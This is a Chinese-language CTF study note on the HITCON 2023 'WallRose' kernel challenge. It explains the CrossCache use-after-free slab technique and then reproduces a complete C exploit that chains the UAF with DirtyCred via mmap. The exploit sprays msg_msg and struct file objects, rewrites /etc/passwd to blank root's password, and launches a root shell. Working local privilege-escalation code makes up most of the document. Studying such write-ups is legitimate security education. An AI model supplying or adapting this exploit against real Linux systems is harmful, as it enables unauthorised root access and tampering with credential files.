Hitcon2023 WallRose学习记录 CrossCache UAF + DirtyCred

0x400大小对象的UAF, 没开memcg, 开了FG-KASLR.

主要是学习手法, 下次遇到了再写exp……

CrossCache UAF

https://org.anize.rs/HITCON-2022/pwn/fourchain-kernel
https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/

如何构造CrossCache UAF.

内存分配释放相关过程

如何分配一个新的页面?

如何释放页面?
下图中有一个地方不准确, 在unfreeze_partials中, 是否discard_slab还有一个kmem_cache_node->nr_partial >= kmem_cache->min_partial的要求, 这也是在kmem_cache_node的partial链表中能看到完全空闲的slab的原因.

从左向右, 首先释放目标slab上的所有对象, 使得其进入partial_list.
之后释放每个slab中的1个对象, 使得partial_list逐渐填满, 触发unfreeze_partials.
在unfreeze_partials中, 由于目标slab完全空闲(所有对象已释放), 则目标slab会被释放回到Buddy_system.

如何填满一个slab? : /sys/kernel/slab/XXX/objs_per_slab 此例中为25
partial_list允许的最大slab数量? : /sys/kernel/slab/XXX/cpu_partial 此例中为13

CrossCache UAF构造

1. Reserving slabs to overflow the partial list

为了填充partial_list直至溢出, 我们需要先持有一些页面.
方法为分配 (objs_per_slab * (cpu_partial+1) ) 个对象.

图中演示了此时active_slab的两种情况, 取决于分配前第一个slab是否是完全空闲的, 明显后者概率更大,于是假设现在处于后一种情况.

2. Setting the target slab as the active slab

第二步是准备目标slab.
分配 (objs_per_slab-1) 个对象, 使得slab 16成为新的active_slab, 其中有 ((objs_per_slab-1) - (objs_per_slab - n)) = n-1 个对象, n为步骤一后slab 15中的对象个数(即slab 15还剩 objs_per_slab - n 个空闲槽位).

3.Triggering the Use-After-Free

第三步, 在目标板中分配vulnerable对象.

4.Setting a new active slab

分配 (objs_per_slab+1) 个对象,并使一个新的slab成为active_slab, 而target_slab不再active, 为释放进partial_list做准备.

5.Emptying the target slab

释放目标板中的所有对象, 触发put_cpu_partial,使得目标板进入partial_list且处于完全空闲状态.

6.Overflowing the partial list to free the target slab

释放第一步中准备的每个slab中的一个对象, 使得其进入partial_list且避免被销毁, 直到填满触发unfreeze_partials, 然后进入到对应的kmem_cache_node, 而target_slab则被discard, 回到buddy_system

DirtyCred

后面的DirtyCred 用的是更简单的mmap 而不是write时的竞争.
出自 flip UAF: https://gist.github.com/d4em0n/470bd48ab6c084be0239f29759cd8747

exp来源: https://chovid99.github.io/posts/hitcon-ctf-2023/

//gcc -pthread -no-pie -static ../../exploit.c  -o exp 
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <errno.h>
#include <inttypes.h>
#include <limits.h>
#include <pthread.h>
#include <signal.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <poll.h>
#include <stdnoreturn.h>
#include <string.h>
#include <unistd.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/timerfd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/resource.h>
#include <linux/capability.h>
#include <sys/xattr.h>
#include <linux/io_uring.h>
#include <linux/membarrier.h>
#include <linux/io_uring.h>
#include <linux/membarrier.h>

#define logd(fmt, ...) fprintf(stderr, (fmt), ##__VA_ARGS__)

/* Cross-cache tunables for the challenge kernel's kmalloc-1k cache. */
#define CC_OVERFLOW_FACTOR 5 // Safety multiplier used to handle pre-existing slab fragmentation
#define OBJS_PER_SLAB 8 // Fetch this from /sys/kernel/slab/kmalloc-1k/objs_per_slab
#define CPU_PARTIAL 24 // Fetch this from /sys/kernel/slab/kmalloc-1k/cpu_partial
#define MSG_SIZE (0x400 - 48) // kmalloc-1k: 0x400 minus the 48-byte msg_msg header. Parenthesized so the
                              // macro expands safely inside larger expressions (e.g. `2 * MSG_SIZE`).
                              // msg_msg is usable here because CONFIG_MEMCG_KMEM is disabled.

/* Report the failing call (message + errno) and terminate the exploit. */
static noreturn void fatal(const char *msg)
{
perror(msg);
exit(EXIT_FAILURE);
}

/*
Cross-cache abstraction taken from https://org.anize.rs/HITCON-2022/pwn/fourchain-kernel
Notes that here is minor adjustments that we made to the abstraction
*/
/* Phases of the cross-cache state machine; cc_next() runs them in order. */
enum {
CC_RESERVE_PARTIAL_LIST = 0, /* step 1: reserve enough slabs to later overflow the partial list */
CC_ALLOC_VICTIM_PAGE,        /* step 2: make a fresh slab the active one, leaving one free slot */
CC_FILL_VICTIM_PAGE,         /* step 4: fill past the victim slab so a new slab becomes active */
CC_EMPTY_VICTIM_PAGE,        /* step 5: free everything on the victim slab */
CC_OVERFLOW_PARTIAL_LIST     /* step 6: overflow the partial list to discard the victim slab */
};

/* Bookkeeping for one cross-cache attack against a single kmem_cache. */
struct cross_cache
{
uint32_t objs_per_slab; /* from /sys/kernel/slab/<cache>/objs_per_slab */
uint32_t cpu_partial;   /* from /sys/kernel/slab/<cache>/cpu_partial */
struct
{
int64_t *overflow_objs;    /* ids of objects used to overflow the partial list */
int64_t *pre_victim_objs;  /* ids allocated just before the vulnerable object */
int64_t *post_victim_objs; /* ids allocated just after the vulnerable object */
};
uint8_t phase;              /* next phase cc_next() will execute */
int (*allocate)(int64_t);   /* callback: allocate one cache object, returns a handle or -1 */
int (*free)(int64_t);       /* callback: free one cache object by handle */
};

/* The single cross-cache instance targeting kmalloc-1k (via msg_msg). */
static struct cross_cache *kmalloc1k_cc;
/*
 * Allocate `to_alloc` objects through the cache's allocation callback and
 * record each returned handle in `repo`.
 * Returns 0 on success, -1 as soon as one allocation fails.
 */
static inline int64_t cc_allocate(struct cross_cache *cc,
                                  int64_t *repo,
                                  uint32_t to_alloc)
{
    uint32_t idx = 0;
    while (idx < to_alloc)
    {
        int64_t handle = cc->allocate(idx);
        if (handle == -1)
            return -1;
        repo[idx] = handle;
        idx++;
    }
    return 0;
}


/*
 * Free objects recorded in `repo` through the cache's free callback.
 * Entries already set to -1 are skipped; freed entries are marked -1.
 * When `per_slab` is true, only indices that are multiples of
 * (objs_per_slab - 1) are freed — roughly one object per reserved slab,
 * so each slab becomes partially free and lands on the partial list.
 */
static inline int64_t cc_free(struct cross_cache *cc,
                              int64_t *repo,
                              uint32_t to_free,
                              bool per_slab)
{
    for (uint32_t idx = 0; idx < to_free; idx++)
    {
        bool not_slab_representative =
            per_slab && (idx % (cc->objs_per_slab - 1)) != 0;
        if (not_slab_representative || repo[idx] == -1)
            continue;
        cc->free(repo[idx]);
        repo[idx] = -1;
    }
    return 0;
}

/*
 * Phase 1: reserve enough objects that freeing one per slab later will
 * overflow the per-cpu partial list. Scaled by CC_OVERFLOW_FACTOR to
 * compensate for pre-existing fragmentation.
 */
static inline int64_t reserve_partial_list_amount(struct cross_cache *cc)
{
    uint32_t count =
        CC_OVERFLOW_FACTOR * cc->objs_per_slab * (cc->cpu_partial + 1);
    cc_allocate(cc, cc->overflow_objs, count);
    return 0;
}

/*
 * Phase 2: allocate objs_per_slab - 1 objects so the new active slab has
 * exactly one slot left for the vulnerable object.
 */
static inline int64_t allocate_victim_page(struct cross_cache *cc)
{
    cc_allocate(cc, cc->pre_victim_objs, cc->objs_per_slab - 1);
    return 0;
}

/*
 * Phase 4: allocate objs_per_slab + 1 objects — this fills the victim
 * slab's remaining slot and forces the allocator onto a brand-new active
 * slab, so the victim slab can later be freed into the partial list.
 */
static inline int64_t fill_victim_page(struct cross_cache *cc)
{
    cc_allocate(cc, cc->post_victim_objs, cc->objs_per_slab + 1);
    return 0;
}

/*
 * Phase 5: release every object placed around the vulnerable one so the
 * victim slab becomes completely free.
 */
static inline int64_t empty_victim_page(struct cross_cache *cc)
{
    cc_free(cc, cc->pre_victim_objs, cc->objs_per_slab - 1, false);
    cc_free(cc, cc->post_victim_objs, cc->objs_per_slab + 1, false);
    return 0;
}

/*
 * Phase 6: free one object per reserved slab so each lands on the per-cpu
 * partial list; overflowing it triggers unfreeze_partials, which discards
 * the fully-free victim slab back to the buddy allocator.
 */
static inline int64_t overflow_partial_list(struct cross_cache *cc)
{
    uint32_t count =
        CC_OVERFLOW_FACTOR * cc->objs_per_slab * (cc->cpu_partial + 1);
    cc_free(cc, cc->overflow_objs, count, true);
    return 0;
}

/*
 * Teardown helper: free every remaining allocation. Used after the victim
 * page is discarded, to flood the PCP freelist so the page moves on to the
 * buddy free area.
 */
static inline int64_t free_all(struct cross_cache *cc)
{
    uint32_t total =
        CC_OVERFLOW_FACTOR * cc->objs_per_slab * (cc->cpu_partial + 1);
    cc_free(cc, cc->overflow_objs, total, false);
    empty_victim_page(cc);
    return 0;
}

/* Advance the cross-cache state machine by exactly one phase. */
int64_t cc_next(struct cross_cache *cc)
{
    uint8_t current = cc->phase++;

    if (current == CC_RESERVE_PARTIAL_LIST)
        return reserve_partial_list_amount(cc);
    if (current == CC_ALLOC_VICTIM_PAGE)
        return allocate_victim_page(cc);
    if (current == CC_FILL_VICTIM_PAGE)
        return fill_victim_page(cc);
    if (current == CC_EMPTY_VICTIM_PAGE)
        return empty_victim_page(cc);
    if (current == CC_OVERFLOW_PARTIAL_LIST)
        return overflow_partial_list(cc);

    /* All phases already executed: nothing left to do. */
    return 0;
}

/*
 * Destroy a cross_cache: free all kernel-side objects, then release the
 * userspace bookkeeping arrays and the struct itself.
 */
void cc_deinit(struct cross_cache *cc)
{
    free_all(cc);
    /* The three id arrays are independent; release them and the owner. */
    free(cc->post_victim_objs);
    free(cc->pre_victim_objs);
    free(cc->overflow_objs);
    free(cc);
}

/*
 * Create `to_alloc` System V message queues and store their ids in `repo`.
 * Exits the process if any msgget() call fails.
 */
void init_msq(int64_t *repo, uint32_t to_alloc ) {
    /* uint32_t loop index: avoids the signed/unsigned comparison the
     * original `int i < uint32_t to_alloc` produced. */
    for (uint32_t i = 0; i < to_alloc; i++) {
        repo[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
        if (repo[i] < 0) {
            logd("[-] msgget() fail\n");
            exit(-1);
        }
    }
}

/*
 * Allocate and initialise a cross_cache descriptor.
 *
 * objs_per_slab / cpu_partial: slab parameters read from /sys/kernel/slab.
 * allocate_fptr / free_fptr:   callbacks that allocate/free one object in
 *                              the target kmem_cache.
 * Returns the descriptor, or NULL on allocation failure.
 * Side effect: creates one message queue per reserved object via init_msq().
 */
struct cross_cache *cc_init(uint32_t objs_per_slab,
                            uint32_t cpu_partial,
                            void *allocate_fptr,
                            void *free_fptr)
{
    struct cross_cache *cc = malloc(sizeof *cc);
    if (!cc)
    {
        perror("init_cross_cache:malloc\n");
        return NULL;
    }
    cc->objs_per_slab = objs_per_slab;
    cc->cpu_partial = cpu_partial;
    cc->free = free_fptr;
    cc->allocate = allocate_fptr;
    cc->phase = CC_RESERVE_PARTIAL_LIST;

    uint32_t n_overflow = objs_per_slab * (cpu_partial + 1) * CC_OVERFLOW_FACTOR;
    uint32_t n_previctim = objs_per_slab - 1;
    uint32_t n_postvictim = objs_per_slab + 1;

    cc->overflow_objs = malloc(sizeof(int64_t) * n_overflow);
    cc->pre_victim_objs = malloc(sizeof(int64_t) * n_previctim);
    cc->post_victim_objs = malloc(sizeof(int64_t) * n_postvictim);
    /* Bug fix: the original used these arrays without checking the mallocs. */
    if (!cc->overflow_objs || !cc->pre_victim_objs || !cc->post_victim_objs)
    {
        free(cc->overflow_objs);   /* free(NULL) is a no-op */
        free(cc->pre_victim_objs);
        free(cc->post_victim_objs);
        free(cc);
        perror("init_cross_cache:malloc\n");
        return NULL;
    }

    init_msq(cc->overflow_objs, n_overflow);
    init_msq(cc->pre_victim_objs, n_previctim);
    init_msq(cc->post_victim_objs, n_postvictim);
    return cc;
}

/*
 * Raise the soft limit of `rlimit` up to its hard limit (needed so the fd
 * sprays can open NUM_SPRAY_FDS files).
 * Returns 0 on success or when already at the maximum; exits via fatal()
 * if the get/set syscalls fail.
 */
static int rlimit_increase(int rlimit)
{
    struct rlimit r;
    if (getrlimit(rlimit, &r))
        fatal("rlimit_increase:getrlimit");

    if (r.rlim_max <= r.rlim_cur)
    {
        /* Bug fix: original used the malformed format "%.lld" (and no
         * newline) for rlim_t; cast explicitly and use %llu. */
        printf("[+] rlimit %d remains at %llu\n", rlimit,
               (unsigned long long)r.rlim_cur);
        return 0;
    }
    r.rlim_cur = r.rlim_max;
    /* Plain assignment instead of assignment-inside-if. */
    int res = setrlimit(rlimit, &r);
    if (res)
        fatal("rlimit_increase:setrlimit");
    printf("[+] rlimit %d increased to %llu\n", rlimit,
           (unsigned long long)r.rlim_max);
    return res;
}

/*
 * Cross-cache allocate callback: msgsnd() a MSG_SIZE-byte message so the
 * kernel allocates a msg_msg object in kmalloc-1k. Returns the queue id,
 * which doubles as the object handle.
 */
static int64_t cc_alloc_kmalloc1k_msg(int64_t msqid)
{
    struct {
        long mtype;
        char mtext[MSG_SIZE];
    } msg;

    msg.mtype = 1;
    memset(msg.mtext, 'A', sizeof(msg.mtext) - 1); /* 'A' == 0x41 filler */
    msg.mtext[sizeof(msg.mtext) - 1] = '\0';
    msgsnd(msqid, &msg, sizeof(msg.mtext), 0);
    return msqid;
}

/*
 * Cross-cache free callback: receive (and discard) one message from the
 * queue, which frees the backing msg_msg object in kmalloc-1k.
 */
static void cc_free_kmalloc1k_msg(int64_t msqid)
{
    struct {
        long mtype;
        char mtext[MSG_SIZE];
    } msg = { .mtype = 0 }; /* mtype 0: take the first message on the queue */

    msgrcv(msqid, &msg, sizeof(msg.mtext), 0, IPC_NOWAIT | MSG_NOERROR);
}

/* Open the vulnerable device; each open allocates one 0x400 rose object. */
int open_rose() {
    int fd = open("/dev/rose", O_RDWR);
    return fd;
}

int rose_fds[2]; // two handles to the same rose allocation (rose_fds[1] freed first, rose_fds[0] used for the second free)
int freed_fd = -1; // fd whose struct file sits on the cross-cache-freed page
#define NUM_SPRAY_FDS 0x300 // number of files opened per spray round
/*
 * Exploit entry point: CrossCache UAF on the 0x400 rose object, then
 * DirtyCred via mmap on the dangling struct file.
 * NOTE(review): exploit-style code — most syscall results in the spray
 * loops are deliberately unchecked.
 */
int main(void)
{
puts("=======================");
puts("[+] Initial setup");
// Writable scratch file used as the spray target for struct file allocations.
system("echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' > /tmp/a");
rlimit_increase(RLIMIT_NOFILE);

// Alloc the first rose
// This will be used later to trigger double free
rose_fds[0] = open_rose();

puts("=======================");
puts("[+] Try to free the page"); // Based on https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/
kmalloc1k_cc = cc_init(OBJS_PER_SLAB, CPU_PARTIAL, cc_alloc_kmalloc1k_msg, cc_free_kmalloc1k_msg);

// Step 1
puts("[+] Step 1: Allocate a lot of slabs (To be put in the partial list later)");
cc_next(kmalloc1k_cc);

// Step 2
puts("[+] Step 2: Allocate target slab that we want to discard");
cc_next(kmalloc1k_cc);

// Step 3
// The victim slab has exactly one free slot left, so this rose object
// lands on it.
puts("[+] Step 3: Put rose in the target slab");
rose_fds[1] = open_rose();

// Step 4
puts("[+] Step 4: Fulfill the target slab until we have a new active slab");
cc_next(kmalloc1k_cc);

// Step 5
puts("[+] Step 5: Try to free rose & other objects with hope that the target slab will be empty + be put in the partial list");
// Free rose, but rose_fds[0] also pointing to the same chunk,
// and we can use rose_fds[0] later to free other chunk that resides in here
close(rose_fds[1]);
cc_next(kmalloc1k_cc);

// Step 6
puts("[+] Step 6: Fulfill the partial list and discard the target slab (because it's empty) to per_cpu_pages");
cc_next(kmalloc1k_cc);
// The page (order 1) will be discarded, and it goes to per_cpu_pages (__free_pages -> free_the_page -> free_unref_page -> free_unref_page_commit)
// We need to make it goes to the free area instead of per_cpu_pages

// Step 7
puts("[+] Step 7: Make PCP freelist full, so that page goes to free area in buddy");
cc_deinit(kmalloc1k_cc);
// We try to make the page stored in pcp goes to free area by making
// the pcp freelist full.
// Free all allocation that we've made before to trigger it, and after that
// We can start our cross-cach exploitation.

puts("=======================");
puts("[+] Start the main exploit");

// Trigger cross-cache, file will use the freed page
// (struct file lives in the filp cache; its slab pages come from the same
// buddy free area the victim page was returned to)
puts("[+] Spray FDs");
int spray_fds[NUM_SPRAY_FDS];
for(int i =0;i<NUM_SPRAY_FDS;i++){
spray_fds[i] = open("/tmp/a", O_RDWR); // /tmp/a is a writable file
if (spray_fds[i] == -1)
fatal("Failed to open FDs");
}

// Before: 2 fd 1 refcount (rose_fds[1] & spray_fds[i])
// Second free through the stale rose handle frees whichever struct file
// reused the rose chunk.
puts("[+] Free one of the FDs via rose");
close(rose_fds[0]);
// After: 1 fd but pointed chunk is free

// Spray to replace the previously freed chunk
// Set the lseek to 0x8, so that we can find easily the fd
puts("[+] Find the freed FD using lseek");
int spray_fds_2[NUM_SPRAY_FDS];
for (int i = 0; i < NUM_SPRAY_FDS; i++) {
spray_fds_2[i] = open("/tmp/a", O_RDWR);
lseek(spray_fds_2[i], 0x8, SEEK_SET);
}
// After: 2 fd 1 refcount (Because new file)

// The freed fd will have lseek value set to 0x8. Try to find it.
// (its struct file is now shared with one of the spray_fds_2 entries)
for (int i = 0; i < NUM_SPRAY_FDS; i++) {
if (lseek(spray_fds[i], 0 ,SEEK_CUR) == 0x8) {
freed_fd = spray_fds[i];
lseek(freed_fd, 0x0, SEEK_SET);
printf("[+] Found freed fd: %d\n", freed_fd);
break;
}
}
if (freed_fd == -1)
fatal("Failed to find FD");

// mmap trick instead of race with write
// The shared mapping keeps write access to the page cache even after the
// underlying struct file is replaced.
puts("[+] DirtyCred via mmap");
char *file_mmap = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, freed_fd, 0);
// After: 3 fd 2 refcount (Because new file)

close(freed_fd);
// After: 2 fd 1 refcount (Because new file)

for (int i = 0; i < NUM_SPRAY_FDS; i++) {
close(spray_fds_2[i]);
}
// After: 1 fd 0 refcount (Because new file)
// Effect: FD in mmap (which is writeable) can be replaced with RDONLY file

// Respray so the freed struct file is reused by /etc/passwd opens.
for (int i = 0; i < NUM_SPRAY_FDS; i++) {
spray_fds[i] = open("/etc/passwd", O_RDONLY);
}
// After: 2 fd 1 refcount (but writeable due to mmap)

// Writing through the stale writable mapping now modifies /etc/passwd:
// give root an empty password.
strcpy(file_mmap, "root::0:0:root:/root:/bin/sh\n");
puts("[+] Finished! Open root shell...");
puts("=======================");
system("su");
return 0;
}

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2022-2024 翰青HanQi

请我喝杯咖啡吧~

支付宝
微信